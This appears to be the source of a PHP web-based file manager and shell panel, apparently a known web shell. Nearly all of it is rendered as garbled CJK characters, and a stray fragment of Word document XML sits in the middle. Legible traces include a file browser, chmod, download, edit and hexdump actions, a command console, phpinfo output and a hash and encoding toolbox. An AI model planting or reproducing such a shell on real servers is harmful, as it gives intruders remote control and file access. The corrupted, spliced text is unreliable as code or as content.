⠤ㅛ❳㑺㔧崠㰠③嬧猴稵❝⤠㼠ⴶ›‶⤪⠤䝌佂䅌卛❳㉲琧嵛㙝㼶㨭㘩㬍ਉ納ਉ㍳㉲琨⑦㑬㕳Ⱐ≷猲䍭瀢⤻ഊळ猲牴⠤搴牳Ⱐ≷猲䍭瀢⤻ഊत昴氵猠㴠ㅲ爱祟洵牧㔨⑤㑲猬․昴氵猩㬍ਉ⑬‽‰㬍ਉ昲爵ㅣ栨⑦㑬㕳‱猠⑦⤠笍ਉव捨㈠✼瑲✮⠤氿✠捬ㅳ猽氶✺✧⤮✾㱴搾㰱⁨爵昽⌠㉮捬㑣欽∧⸨⠤晛❴祰㔧崽㴧昴氵✩㼧木尧䘴氵獔㈲汳尧Ɱ㍬氬尧✮㍲氵湣㉤㔨⑦嬧渱洵❝⤮❜✬⁜❶㐵睜✩∾✮桴浬獰㕣㐱汣栱牳⠤晛❮ㅭ㔧崩㨧木尧䘴氵獍ㅮ尧ⱜ✧⸤晛❰ㅴ栧崮❜✩㬢⁴㑴氵㴧‮․晛❬㑮欧崠⸠✾㱢㹼‧‮⁨瑭汳瀵挴ㅬ捨ㅲ猨⑦嬧渱洵❝⤠⸠✠簼⽢㸧⤮✼⼱㸼⽴搾㱴搾✮⠨⑦嬧瑹瀵❝㴽❦㑬㔧⤿洱摓㑺㔨⑦嬧猴稵❝⤺⑦嬧瑹瀵❝⤮✼⽴搾㱴搾✮⑦嬧洲搴晹❝⸧㰯瑤㸼瑤㸧⸤晛✲睮㕲❝⸧⼧⸤晛❧爲㍰❝⸧㰯瑤㸼瑤㸼ㄠ桲㕦㴣′湣水捫㴢木尧䘴氵獔㈲汳尧Ɱ㍬氬尧✮㍲氵湣㉤㔨⑦嬧渱洵❝⤮❜✬尧捨洲摜✩∾✮⑦嬧瀵牭猧崍ਉउ⸧㰯瑤㸼瑤㸼ㄠ桲㕦㴢⌢′湣水捫㴢木尧䘴氵獔㈲汳尧Ɱ㍬氬尧✮㍲氵湣㉤㔨⑦嬧渱洵❝⤮❜✬⁜❲㕮ㅭ㕜✩∾刼⼱㸠㰱⁨爵昽∣∠㉮捬㑣欽≧⡜❆㑬㕳吲㉬獜✬渳汬ⱜ✧⸳牬㕮挲搵⠤晛❮ㅭ㔧崩⸧尧Ⱐ尧琲㍣桜✩∾吼⼱㸧⸨⠤晛❴祰㔧崽㴧昴氵✩㼧‼ㄠ桲㕦㴢⌢′湣水捫㴢木尧䘴氵獔㈲汳尧Ɱ㍬氬尧✮㍲氵湣㉤㔨⑦嬧渱洵❝⤮❜✬⁜✵搴瑜✩∾䔼⼱㸠㰱⁨爵昽∣∠㉮捬㑣欽≧⡜❆㑬㕳吲㉬獜✬渳汬ⱜ✧⸳牬㕮挲搵⠤晛❮ㅭ㔧崩⸧尧Ⱐ尧搲睮氲ㅤ尧⤢㹄㰯ㄾ✺✧⤮✼ㄠ桲㕦㴢⌢′湣水捫㴢木尧䘴氵獍ㅮ尧Ɱ㍬氬尧搵氵琵尧Ⱐ尧✮㍲氵湣㉤㔨⑦嬧渱洵❝⤮❜✩∾⁘‼⼱㸼⽴搾㰯瑲㸧㬍ਉत氠㴠⑬㼰㨶㬍ਉ納ਉ㕣栲•㱴爾㱴搠挲汳瀱渽㜾ഊ़㑮瀳琠瑹瀵㵨㑤搵渠渱洵㴱⁶ㅬ㌵㴧䘴氵獍ㅮ✾ഊ़㑮瀳琠瑹瀵㵨㑤搵渠渱洵㵣⁶ㅬ㌵㴧∠⸠桴浬獰㕣㐱汣栱牳⠤䝌佂䅌卛❣睤❝⤠⸢✾ഊ़㑮瀳琠瑹瀵㵨㑤搵渠渱洵㵣栱牳㕴⁶ㅬ㌵㴧∮ 㑳猵琨⑟偏協嬧捨ㅲ猵琧崩㼤彐体呛❣栱牳㕴❝㨧✩⸢✾ഊ़⽦㉲派㰯琱扬㔾㰯搴瘾∻ഊഊऍਠ†⁭ㅤ昲㉴㕲⠩㬍ਠ納ਠ†‍ਠ⁦㍮捴㐲渠洱摆㑬㕳吲㉬猨⤠笍ਉ㑦⠠㑳猵琨⑟偏協嬧瀶❝⤠⤍ਉत彐体呛❰㘧崠㴠㍲汤㕣㉤㔨⑟偏協嬧瀶❝⤻ഊऴ昨䀤彐体呛❰愧崽㴧搲睮氲ㅤ✩⁻ഊउ㑦⡀㑳彦㑬㔨⑟偏協嬧瀶❝⤠☦⁀㑳彲㔱搱扬㔨⑟偏協嬧瀶❝⤩⁻ഊउल扟獴ㅲ琨∲扟杺栱湤氵爢Ⱐ田㥥⤻ഊउ२㔱搵爨≃㉮琵湴ⵄ㑳瀲猴琴㉮㨠ㅴ琱捨洵湴㬠昴氵渱洵㴢⹢ㅳ㕮ㅭ㔨⑟偏協嬧瀶❝⤩㬍ਉउ㑦 昳湣琴㉮張破獴猨≭㑭㕟挲湴㕮瑟瑹瀵∩⤠笍ਉउत瑹瀵‽⁀洴洵彣㉮琵湴彴祰㔨⑟偏協嬧瀶❝⤻ഊउउ栵ㅤ㕲⠢䌲湴㕮琭呹瀵㨠∠⸠⑴祰㔩㬍ਉउ素㕬猵ഊ††††††††栵ㅤ㕲⠢䌲湴㕮琭呹瀵㨠ㅰ灬㑣ㅴ㐲港㉣琵琭獴爵ㅭ∩㬍ਉउ⑦瀠㴠䁦㉰㕮⠤彐体呛❰㘧崬•爢⤻ഊउऴ昨⑦瀩⁻ഊउउ睨㑬㔨⅀昵㉦⠤晰⤩ഊउउव捨㈠䁦爵ㅤ⠤晰Ⱐ㘰慵⤻ഊउउ晣氲猵⠤晰⤻ഊउॽഊउ紵破琻ഊॽഊऴ昨⁀⑟偏協嬧灡❝‽㴠❭武㑬</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>㔧 ⁻ഊउ㑦⠡昴氵張破獴猨⑟偏協嬧瀶❝⤩⁻ഊउत晰‽⁀昲瀵渨⑟偏協嬧瀶❝Ⱐ❷✩㬍ਉउ㑦⠤晰⤠笍ਉउत彐体呛❰愧崠㴠∵搴琢㬍ਉउ०捬㉳㔨⑦瀩㬍ਉउ納ਉॽഊॽഊऍਠ†洱摨㔱搨⤻ഊव捨㈠✼搴瘠捬ㅳ猽栵ㅤ㕲㸧㬍ਉ㑦⠠Ⅶ㑬㕟㕸㑳瑳⡀⑟偏協嬧瀶❝⤠⤠笍ਉव捨㈠∼灲㔠捬ㅳ猽浬㘠獴祬㔽❭ㅲ朴渭琲瀺楰砧㹆䥌䔠䑏䕓吠乏吠䕘䥔匠㰯灲㔾㰯搴瘾∻ഊउ洱摆㈲琵爨⤻ഊउ爵琳牮㬍ਉ納ਉ␳㑤‽⁀瀲猴硟朵瑰眳㑤⡀昴氵㉷渵爨⑟偏協嬧瀶❝⤩㬍ਉ㑦⠡␳㑤⤠笍ਉत㌴摛❮ㅭ㔧崠㴠䁦㑬㔲睮㕲⠤彐体呛❰㘧崩㬍ਉत朴摛❮ㅭ㔧崠㴠䁦㑬㕧爲㍰⠤彐体呛❰㘧崩㬍ਉ素㕬猵․朴搠㴠䁰㉳㑸彧㕴杲朴搨䁦㑬㕧爲㍰⠤彐体呛❰㘧崩⤻ഊव捨㈠✼獰ㅮ㹎ㅭ㔺㰯獰ㅮ㸠✮桴浬獰㕣㐱汣栱牳⡀戱猵渱洵⠤彐体呛❰㘧崩⤮✠㱳瀱渾匴稵㨼⽳瀱渾‧⸨㑳彦㑬㔨⑟偏協嬧瀶❝⤿洱摓㑺㔨昴氵猴稵⠤彐体呛❰㘧崩⤺✭✩⸧‼獰ㅮ㹐㕲洴獳㐲渺㰯獰ㅮ㸠✮洱摐㕲浳䌲氲爨⑟偏協嬧瀶❝⤮✠㱳瀱渾佷渵爯䝲㈳瀺㰯獰ㅮ㸠✮␳㑤嬧渱洵❝⸧⼧⸤朴摛❮ㅭ㔧崮✼扲㸧㬍ਉ㕣栲‧㱢爾✻ഊऴ昨‵浰瑹⠤彐体呛❰愧崩 ഊउ⑟偏協嬧灡❝‽‧瘴㕷✻ഊऴ昨‴獟昴氵⠤彐体呛❰㘧崩 ഊउ⑭‽‱牲ㅹ⠧嘴㕷✬‧䠴杨水杨琧Ⱐ❄㉷湬㈱搧Ⱐ❅搴琧Ⱐ❃桭㉤✬‧刵渱洵✬‧吲㍣栧⤻ഊव汳㔍ਉत洠㴠ㅲ爱礨❃桭㉤✬‧刵渱洵✬‧吲㍣栧⤻ഊ०㉲㔱捨⠤洠ㅳ․瘩ഊउ㕣栲‧㰱†桲㕦㴣′湣水捫㴢木渳汬Ɱ㍬氬渳汬ⱜ✧⹳瑲琲氲眵爨⑶⤮❜✩∾㱳瀱渾✮⠨獴牴㉬㉷㕲⠤瘩㴽䀤彐体呛❰愧崩㼧㱢㸼獰ㅮ㸠✮⑶⸧‼⽳瀱渾‼⽢㸧㨤瘩⸧‼⽳瀱渾㰯ㄾ‧㬍ਉ㕣栲‧㱢爾㱢爾✻ഊॳ眴瑣栨⑟偏協嬧灡❝⤠笍ਉॣㅳ㔠❶㐵眧㨍ਉउ㕣栲‧㱰爵⁣氱獳㵭氶㸧㬍ਉउ⑦瀠㴠䁦㉰㕮⠤彐体呛❰㘧崬‧爧⤻ഊउऴ昨⑦瀩⁻ഊउउ睨㑬㔨‡䁦㔲昨⑦瀩 ഊउउव捨㈠桴浬獰㕣㐱汣栱牳⡀晲㔱搨⑦瀬‶ち甩⤻ഊउउ䁦捬㉳㔨⑦瀩㬍ਉउ納ਉउ㕣栲‧㰯灲㔾✻ഊउॢ爵ㅫ㬍ਉॣㅳ㔠❨㑧桬㑧桴✺ഊउऴ昨⁀㑳彲㔱搱扬㔨⑟偏協嬧瀶❝⤠⤠笍ਉउव捨㈠✼搴瘠捬ㅳ猽浬㘠獴祬㔽≢ㅣ歧爲㍮搭挲氲爺‣㔶㔶㔶㭣㉬㉲㩢氱捫㬢㸧㬍ਉउत挲搵‽⁀栴杨水杨瑟昴氵⠤彐体呛❰㘧崬瑲㌵⤻ഊउउ㕣栲⁳瑲彲㕰氱挵⠱牲ㅹ⠧㱳瀱渠✬✼⽳瀱渾✩Ⱐㅲ爱礨✼昲湴‧Ⱗ㰯昲湴㸧⤬④㉤㔩⸧㰯搴瘾✻ഊउॽഊउॢ爵ㅫ㬍ਉॣㅳ㔠❣桭㉤✺ഊउऴ昨‡㕭灴礨⑟偏協嬧灯❝⤠⤠笍ਉउत瀵牭猠㴠〻ഊउउ昲爨␴㵳瑲氵渨⑟偏協嬧灯❝⤭㘻␴㸽〻ⴭ␴⤍ਉउउ⑰㕲浳‫㴠⠴湴⤤彐体呛❰漧嵛␴崪瀲眨㠬 獴牬㕮⠤彐体呛❰漧崩ⴤ㐭㘩⤻ഊउउ㑦⠡䁣桭㉤⠤彐体呛❰㘧崬․瀵牭猩⤍ਉउउ㕣栲‧䌱湜❴⁳㕴⁰㕲洴獳㐲湳ℼ扲㸼獣爴灴㹤㉣㍭㕮琮浦⹰漮瘱氳㔽∢㬼⽳捲㑰琾✻ഊउॽഊउॣ氵ㅲ獴ㅴ挱捨㔨⤻ഊउव捨㈠✼獣爴灴㹰潟㴢∻㰯獣爴灴㸼昲牭′湳㍢洴琽≧⡮㍬氬渳汬Ɱ㍬氬渳汬ⱴ栴献捨洲搮瘱氳㔩㭲㕴㍲渠昱汳㔻∾㰴湰㍴⁴祰㔽琵硴⁮ㅭ㔽捨洲搠瘱氳㔽∧⹳㍢獴爨獰爴湴昨✥㈧Ⱐ昴氵瀵牭猨⑟偏協嬧瀶❝⤩Ⱝ甩⸧∾㰴湰㍴⁴祰㔽猳扭㑴⁶ㅬ㌵㴢㸾∾㰯昲牭㸧㬍ਉउ扲㔱欻ഊउ挱猵‧㕤㑴✺ഊउऴ昨‡㑳彷爴琱扬㔨⑟偏協嬧瀶❝⤩⁻ഊउउ㕣栲‧䘴氵‴獮尧琠睲㑴㔱扬㔧㬍ਉउॢ爵ㅫ㬍ਉउ納ਉउ㑦⠠ℵ浰瑹⠤彐体呛❰漧崩 ⁻ഊउउ⑴㑭㔠㴠䁦㑬㕭琴洵⠤彐体呛❰㘧崩㬍ਉउत彐体呛❰漧崠㴠猳扳瑲⠤彐体呛❰漧崬㘩㬍ਉउत晰‽⁀昲瀵渨⑟偏協嬧瀶❝Ⱒ眢⤻ഊउउ㑦⠤晰⤠笍ਉउउ䁦睲㑴㔨⑦瀬⑟偏協嬧灯❝⤻ഊउउी晣氲猵⠤晰⤻ഊउउव捨㈠❓ㅶ㕤ℼ扲㸼獣爴灴㹰潟㴢∻㰯獣爴灴㸧㬍ਉउउ䁴㈳捨⠤彐体呛❰㘧崬⑴㑭㔬⑴㑭㔩㬍ਉउॽഊउॽഊउव捨㈠✼昲牭′湳㍢洴琽≧⡮㍬氬渳汬Ɱ㍬氬渳汬ⱜ✶尧⭴栴献琵硴⹶ㅬ㌵⤻爵琳牮⁦ㅬ猵㬢㸼琵硴ㅲ㔱⁮ㅭ㔽琵硴⁣氱獳㵢㑧ㅲ㔱㸧㬍ਉउ⑦瀠㴠䁦㉰㕮⠤彐体呛❰㘧崬‧爧⤻ഊउऴ昨⑦瀩⁻ഊउउ睨㑬㔨‡䁦㔲昨⑦瀩 ഊउउव捨㈠桴浬獰㕣㐱汣栱牳⡀晲㔱搨⑦瀬‶ち甩⤻ഊउउ䁦捬㉳㔨⑦瀩㬍ਉउ納ਉउ㕣栲‧㰯琵硴ㅲ㔱㸼㑮瀳琠瑹瀵㵳㍢洴琠瘱氳㔽∾㸢㸼⽦㉲派✻ഊउॢ爵ㅫ㬍ਉॣㅳ㔠❨㕸搳浰✺ഊउत挠㴠䁦㑬㕟朵瑟挲湴㕮瑳⠤彐体呛❰㘧崩㬍ਉउ⑮‽‰㬍ਉउ⑨‽‱牲ㅹ⠧〰〰〰〰㱢爾✬✧Ⱗ✩㬍ਉउ⑬㕮‽⁳瑲氵渨④⤻ഊउ०㉲ ␴㴰㬠␴㰤氵渻‫⬤㐩⁻ഊउउ⑨嬶崠⸽⁳灲㑮瑦⠧┰慘✬㉲搨④嬤㑝⤩⸧‧㬍ਉउॳ眴瑣栠⠠㉲搨④嬤㑝⤠⤠笍ਉउउ挱猵‰㨠․桛慝‮㴠✠✻⁢爵ㅫ㬍ਉउउ挱猵‹㨠․桛慝‮㴠✠✻⁢爵ㅫ㬍ਉउउ挱猵‶〺․桛慝‮㴠✠✻⁢爵ㅫ㬍ਉउउ挱猵‶漺․桛慝‮㴠✠✻⁢爵ㅫ㬍ਉउउ搵昱㍬琺․桛慝‮㴠④嬤㑝㬠扲㔱欻ഊउउ納ਉउत渫⬻ഊउउ㑦 ⑮‽㴠潡⤠笍ਉउउ⑮‽‰㬍ਉउउ㑦 ␴⬶‼․氵温⁻⑨嬰崠⸽⁳灲㑮瑦⠧┰㡘✬␴⬶⤮✼扲㸧㭽ഊउउत桛㙝‮㴠✼扲㸧㬍ਉउउ⑨孡崠⸽•屮∻ഊउउ納ਉठॽഊउव捨㈠✼琱扬㔠挵汬獰ㅣ㑮朽㘠挵汬瀱摤㑮朽椠执挲氲爽扬ㅣ款㱴爾㱴搠执挲氲爽杲ㅹ㸼獰ㅮ⁳瑹氵㴢昲湴⵷㔴杨琺⁮㉲洱氻∾㱰爵㸧⸤桛そ⸧㰯灲㔾㰯獰ㅮ㸼⽴搾㱴搠执挲氲爽⍡㡡㡡㠾㱰爵㸧⸤桛㙝⸧㰯灲㔾㰯瑤㸼瑤⁢杣㉬㉲㴣潯潯潯㸼灲㔾✮桴浬獰㕣㐱汣栱牳⠤桛慝⤮✼⽰爵㸼⽴搾㰯瑲㸼⽴ㅢ氵㸧㬍ਉउ扲㔱欻ഊउ挱猵‧爵渱洵✺ഊउऴ昨‡㕭灴礨⑟偏協嬧灯❝⤠⤠笍ਉउऴ昨⅀爵渱洵⠤彐体呛❰㘧崬․彐体呛❰漧崩⤍ਉउउ㕣栲‧䌱湜❴⁲㕮ㅭ㔡㱢爾✻ഊउउ㕬猵ഊउउ।㐵⠧㱳捲㑰琾木渳汬Ɱ㍬氬∧⸳牬㕮挲搵⠤彐体呛❰漧崩⸧∬渳汬Ⱒ∩㰯獣爴灴㸧⤻ഊउॽഊउव捨㈠✼昲牭′湳㍢洴琽≧⡮㍬氬渳汬Ɱ㍬氬渳汬ⱴ栴献渱洵⹶ㅬ㌵⤻爵琳牮⁦ㅬ猵㬢㸼㑮瀳琠瑹瀵㵴㕸琠渱洵㵮ㅭ㔠瘱氳㔽∧⹨瑭汳瀵挴ㅬ捨ㅲ猨⑟偏協嬧瀶❝⤮✢㸼㑮瀳琠瑹瀵㵳㍢洴琠瘱氳㔽∾㸢㸼⽦㉲派✻ഊउॢ爵ㅫ㬍ਉॣㅳ㔠❴㈳捨✺ഊउऴ昨‡㕭灴礨⑟偏協嬧灯❝⤠⤠笍ਉउत琴洵‽⁳瑲琲琴洵⠤彐体呛❰漧崩㬍ਉउऴ昨⑴㑭㔩⁻ഊउउऴ昨ⅴ㈳捨⠤彐体呛❰㘧崬⑴㑭㔬⑴㑭㔩⤍ਉउउव捨㈠❆ㄴ氡✻ഊउउव汳㔍ਉउउव捨㈠❔㈳捨㕤℧㬍ਉउॽ‵汳㔠㕣栲‧䈱搠琴洵⁦㉲洱琡✻ഊउॽഊउॣ氵ㅲ獴ㅴ挱捨㔨⤻ഊउव捨㈠✼獣爴灴㹰潟㴢∻㰯獣爴灴㸼昲牭′湳㍢洴琽≧⡮㍬氬渳汬Ɱ㍬氬渳汬ⱴ栴献琲㍣栮瘱氳㔩㭲㕴㍲渠昱汳㔻∾㰴湰㍴⁴祰㔽琵硴⁮ㅭ㔽琲㍣栠瘱氳㔽∧⹤ㅴ㔨≙⵭ⵤ⁈㨴㩳∬⁀昴氵浴㑭㔨⑟偏協嬧瀶❝⤩⸧∾㰴湰㍴⁴祰㔽猳扭㑴⁶ㅬ㌵㴢㸾∾㰯昲牭㸧㬍ਉउ扲㔱欻ഊॽഊव捨㈠✼⽤㑶㸧㬍ਉ洱摆㈲琵爨⤻ഊ素‍਍੦㍮捴㐲渠洱摰桰㕶ㅬ⠩ഊ笍ਠ†⁭ㅤ栵ㅤ⠩㬍ਠ†‍ਠ†‴昨㑳猵琨⑟偏協嬧灡❝⤠☦ ⑟偏協嬧灡❝‽㴠✴渴✩⤠笍ਉव捨㈠✼搴瘠捬ㅳ猽栵ㅤ㕲㸧㬍ਉल扟獴ㅲ琨⤻ഊउ⑉义㴴渴彧㕴弱汬⠩㬠ഊ灲㑮琠✼琱扬㔠戲牤㕲㴰㸼瑲㸧ഊम✼瑤⁣氱獳㴢水獴㑮朢㸼昲湴⁣氱獳㴢栴杨水杨瑟瑸琢㹐ㅲㅭ㰯瑤㸧ഊम✼瑤⁣氱獳㴢水獴㑮朢㸼昲湴⁣氱獳㴢栴杨水杨瑟瑸琢㹇氲戱氠瘱氳㔼⽴搾✍ਉ⸧㱴搠捬ㅳ猽≬㑳琴湧∾㱦㉮琠捬ㅳ猽≨㑧桬㑧桴彴硴∾䰲挱氠嘱氳㔼⽴搾✍ਉ⸧㱴搠捬ㅳ猽≬㑳琴湧∾㱦㉮琠捬ㅳ猽≨㑧桬㑧桴彴硴∾䅣挵獳㰯瑤㸼⽴爾✻ഊ昲爵ㅣ栠⠤䥎䤠ㅳ․瀱爱洠㴾․瘱氳㕳⤠ഊ॰爴湴•屮∮✼瑲㸧ഊउ⸧㱴搠捬ㅳ猽≬㑳琴湧∾㱢㸧⸤瀱爱洮✼⽴搾✍ਉम✼瑤⁣氱獳㴢水獴㑮朢㸧⸤瘱氳㕳嬧杬㉢ㅬ彶ㅬ㌵❝⸧‼⽴搾✍ਉम✼瑤⁣氱獳㴢水獴㑮朢㸧⸤瘱氳㕳嬧氲挱江瘱氳㔧崮✠㰯瑤㸧ഊउ⸧㱴搠捬ㅳ猽≬㑳琴湧∾✮⑶ㅬ㌵獛✱捣㕳猧崮✠㰯瑤㸼⽴爾✻ഊउ⑴浰‽′扟朵瑟捬㔱渨⤻ഊ††††⑴浰‽⁰爵束爵灬ㅣ㔨✡⡢㉤祼ㄺ屷⭼戲摹Ⱐ瑤Ⱐ瑨Ⱐ栶Ⱐ桡⤠笮⩽Ⅽ猴唧Ⱗ✬⑴浰⤻ഊउ⑴浰‽⁰爵束爵灬ㅣ㔨✡瑤Ⱐ瑨⁻⠮⨩紡浳㑕✬✮㔬‮瘬‮栬‮栠瑨⁻␶紧Ⱔ瑭瀩㬍ਉव捨㈠獴牟爵灬ㅣ㔨✼栶✬✼桡✬․瑭瀩‮✼⽤㑶㸼扲㸧㬍ਉ納ਠ†‍ਠ†‴昨㑳猵琨⑟偏協嬧灡❝⤠☦ ⑟偏協嬧灡❝‽㴠✴湦㈧⤩⁻ഊउ㕣栲‧㱤㑶⁣氱獳㵨㔱搵爾㱳瑹氵㸮瀠筣㉬㉲㨣〰〻紼⽳瑹氵㸧㬍ਉल扟獴ㅲ琨⤻ഊउ灨瀴湦㈨⤻ഊउ⑴浰‽′扟朵瑟捬㔱渨⤻ഊ††††⑴浰‽⁰爵束爵灬ㅣ㔨✡⡢㉤祼ㄺ屷⭼戲摹Ⱐ瑤Ⱐ瑨Ⱐ栶Ⱐ桡⤠笮⩽Ⅽ猴唧Ⱗ✬⑴浰⤻ഊउ⑴浰‽⁰爵束爵灬ㅣ㔨✡瑤Ⱐ瑨⁻⠮⨩紡浳㑕✬✮㔬‮瘬‮栬‮栠瑨⁻␶紧Ⱔ瑭瀩㬍ਉव捨㈠獴牟爵灬ㅣ㔨✼栶✬✼桡✬․瑭瀩‮✼⽤㑶㸼扲㸧㬍ਉ納ਠ†‍ਠ†‴昨㑳猵琨⑟偏協嬧灡❝⤠☦ ⑟偏協嬧灡❝‽㴠✵硴㕮✩⤠笍ਉव捨㈠✼搴瘠捬ㅳ猽栵ㅤ㕲㸧㬍ਉल扟獴ㅲ琨⤻ഊठ††⑅塔㵧㕴彬㈱搵摟㕸琵湳㐲湳 ⤻ഊ††⁰爴湴‧㱴ㅢ氵⁢㉲搵爽〾㱴爾㱴搠捬ㅳ猽≬㑳琴湧∾✍ਉ⸴浰氲搵⠧㰯瑤㸼⽴爾✮≜渢⸧㱴爾㱴搠捬ㅳ猽≬㑳琴湧∾✬․䕘吩ഊम✼⽴搾㰯瑲㸼⽴ㅢ氵㸧ഊम挲㍮琨⑅塔⤮✠㕸琵湳㐲湳⁬㈱搵搧㬍ਉऍਠ†††‍ਠ†††‵捨㈠✼⽤㑶㸼扲㸧㬍ਉ納ਠ†‍ਠ†‍ਉ㑦⠵浰瑹⠤彐体呛✱樱砧崩…☠ℵ浰瑹⠤彐体呛❰㘧崩⤍ਉत当䕓卉低孭摩⠤当䕒噅剛❈呔偟䡏協❝⤠⸠✱樱砧崠㴠昱汳㔻ഊ††㕣栲‧㱤㑶⁣氱獳㵨㔱搵爾㱃㕮琵爾㰱⁨爵昽⌠㉮捬㑣欽≧⡜❰桰㕶ㅬ尧Ɱ㍬氬尧尧ⱜ✴渴尧⤢㹼⁉义彉乆传簠㰯ㄾ㰱⁨爵昽⌠㉮捬㑣欽≧⡜❰桰㕶ㅬ尧Ɱ㍬氬尧尧ⱜ✴湦㉜✩∾††簠灨瀴湦㈠簼⼱㸼ㄠ桲㕦㴣′湣水捫㴢木尧灨瀵瘱汜✬渳汬ⱜ❜✬尧㕸琵湜✩∾†⁼‵硴㕮猴㉮猠⁼㰯ㄾ㰯挵湴㕲㸼扲㸼昲牭⁮ㅭ㔽灦⁭㕴栲搽瀲獴′湳㍢洴琽≧⡜❰桰㕶ㅬ尧Ɱ㍬氬瑨㑳⹣㉤㔮瘱氳㔬尧尧⤻⁲㕴㍲渠昱汳㔻∾㱴㕸琱爵ㄠ渱洵㵣㉤㔠捬ㅳ猽戴朱爵ㄠ㑤㵐桰䌲搵㸧⸨ℵ浰瑹⠤彐体呛❰㘧崩㽨瑭汳瀵挴ㅬ捨ㅲ猨⑟偏協嬧瀶❝⤺✧⤮✼⽴㕸琱爵ㄾ㱣㕮琵爾㰴湰㍴⁴祰㔽猳扭㑴⁶ㅬ㌵㵅瘱氠獴祬㔽≭ㅲ朴渭琲瀺楰砢㸼⽣㕮琵爾✻ഊव捨㈠✼⽦㉲派㱰爵‴搽偨灏㍴瀳琠獴祬㔽∧⸨㕭灴礨⑟偏協嬧瀶❝⤿❤㑳灬ㅹ㩮㉮㔻✺✧⤮❭ㅲ朴渭琲瀺楰砻∠捬ㅳ猽浬㘾✻ഊऴ昨ℵ浰瑹⠤彐体呛❰㘧崩⤠笍ਉल扟獴ㅲ琨⤻ഊउ㕶ㅬ⠤彐体呛❰㘧崩㬍ਉव捨㈠桴浬獰㕣㐱汣栱牳⠲扟朵瑟捬㔱渨⤩㬍ਉ納ਉ㕣栲‧㰯灲㔾㰯搴瘾✻ഊ†ഊ††洱摦㈲琵爨⤻ഊ納਍੦㍮捴㐲渠洱摨ㅳ栨⤍੻ഊ††㑦⠡昳湣琴㉮張破獴猨❨㕸慢㑮✩⤠筦㍮捴㐲渠栵硡戴渨⑰⤠筲㕴㍲渠搵换㑮⡨㕸搵挨⑰⤩㭽納ਠ†‴昨Ⅶ㍮捴㐲湟㕸㑳瑳⠧戴湨㕸✩⤠筦㍮捴㐲渠戴湨㕸⠤瀩⁻爵琳牮⁤㕣栵砨戴湤㕣⠤瀩⤻絽ഊऴ昨Ⅶ㍮捴㐲湟㕸㑳瑳⠧栵硡ㅳ挴㐧⤩⁻昳湣琴㉮⁨㕸愱獣㐴⠤瀩笤爽✧㭦㉲⠤㐽〻␴㱳瑲䰵渨⑰⤻␴⬽愩笤爮㵣桲⡨㕸搵挨⑰嬤㑝⸤灛␴⬶崩⤻絲㕴㍲渠⑲㭽納ਉ㑦⠡昳湣琴㉮張破獴猨✱獣㐴慨㕸✩⤠筦㍮捴㐲渠ㅳ挴㑡栵砨⑰⥻⑲㴧✻昲爨␴㴰㬤㐼獴牬㕮⠤瀩㬫⬤㐩⑲⸽⁳灲㑮瑦⠧┰慘✬㉲搨⑰嬤㑝⤩㭲㕴㍲渠獴牴㈳灰㕲⠤爩㭽納ਉ㑦⠡昳湣琴㉮張破獴猨❦㍬江㍲氵湣㉤㔧⤩⁻昳湣琴㉮⁦㍬江㍲氵湣㉤㔨⑰⥻⑲㴧✻昲爨␴㴰㬤㐼獴牬㕮⠤瀩㬫⬤㐩⑲⸽‧┧⹤㕣栵砨㉲搨⑰嬤㑝⤩㭲㕴㍲渠獴牴㈳灰㕲⠤爩㭽納ਉ⑳瑲㑮杔㈲汳‽‱牲ㅹ⠍ਉध䈱猵敵‵湣㉤㔧‽㸠❢ㅳ㕥畟㕮挲搵✬ഊउ❂ㅳ㕥甠搵挲搵✠㴾‧戱猵敵彤㕣㉤㔧Ⰽਠ†††‧浤椠栱獨✠㴾‧浤椧Ⰽਉध獨ㄶ⁨ㅳ栧‽㸠❳栱㘧Ⰽਉध捲祰琧‽㸠❣特灴✬ഊउ❃剃潡✠㴾‧捲捯愧Ⰽਉध啲氠㕮挲搵✠㴾‧㍲氵湣㉤㔧Ⰽਉध啲氠搵挲搵✠㴾‧㍲汤㕣㉤㔧Ⰽਉध䘳汬″牬㕮挲搵✠㴾‧昳汬弳牬㕮挲搵✬ഊउ❈瑭汳瀵挴ㅬ捨ㅲ猧‽㸠❨瑭汳瀵挴ㅬ捨ㅲ猧Ⰽਉऍਉ⤻ഊऍਉ洱摨㔱搨⤻ഊव捨㈠✼搴瘠捬ㅳ猽栵ㅤ㕲㸧㬍ਉ㑦⠵浰瑹⠤彐体呛✱樱砧崩☦ℵ浰瑹⠤彐体呛❰㘧崩⤍ਉत当䕓卉低孭摩⠤当䕒噅剛❈呔偟䡏協❝⤮✱樱砧崠㴠昱汳㔻ഊव捨㈠∼昲牭†㉮匳扭㑴㴧木渳汬Ɱ㍬氬瑨㑳⹳㕬㕣瑔㈲氮瘱氳㔬瑨㑳⸴湰㍴⹶ㅬ㌵⤻⁲㕴㍲渠昱汳㔻✾㱳㕬㕣琠渱洵㴧猵氵捴吲㉬✾∻ഊ०㉲㔱捨⠤獴爴湧吲㉬猠ㅳ․欠㴾․瘩ഊउ㕣栲•㰲灴㐲渠瘱氳㔽✢⹨瑭汳瀵挴ㅬ捨ㅲ猨⑶⤮∧㸢⸤欮∼⼲灴㐲渾∻ഊउ㕣栲•㰯猵氵捴㸼㑮瀳琠瑹瀵㴧猳扭㑴✠瘱氳㔽✾㸧⼾㱢爾㱴㕸琱爵ㄠ渱洵㴧㑮瀳琧⁳瑹氵㴧洱牧㑮⵴㉰㩩灸✠捬ㅳ猽戴朱爵ㄾ∮⠵浰瑹⠤彐体呛❰㘧崩㼧✺桴浬獰㕣㐱汣栱牳⡀⑟偏協嬧灡❝⤩⸢㰯琵硴ㅲ㔱㸼⽦㉲派㱰爵⁣氱獳㴧浬㘧⁳瑹氵㴧∮⠵浰瑹⠤彐体呛❰㘧崩㼧搴獰氱示渲渵㬧㨧✩⸢洱牧㑮⵴㉰㩩灸✠㑤㴧獴牏㍴瀳琧㸢㬍ਉ㑦⠡㕭灴礨⑟偏協嬧瀶❝⤩⁻ഊउ㑦⠴湟ㅲ爱礨⑟偏協嬧瀶❝Ⱐ⑳瑲㑮杔㈲汳⤩㕣栲⁨瑭汳瀵挴ㅬ捨ㅲ猨⑟偏協嬧瀶❝⠤彐体呛❰愧崩⤻ഊॽഊव捨㈠∼⽤㑶㸢㬍ਉ洱摆㈲琵爨⤻ഊ††ഊ納੦㍮捴㐲渠洱摤㉳⠩ഊ笍ਠ†⁭ㅤ栵ㅤ⠩㬍ਠ†‵捨㈠✼搴瘠捬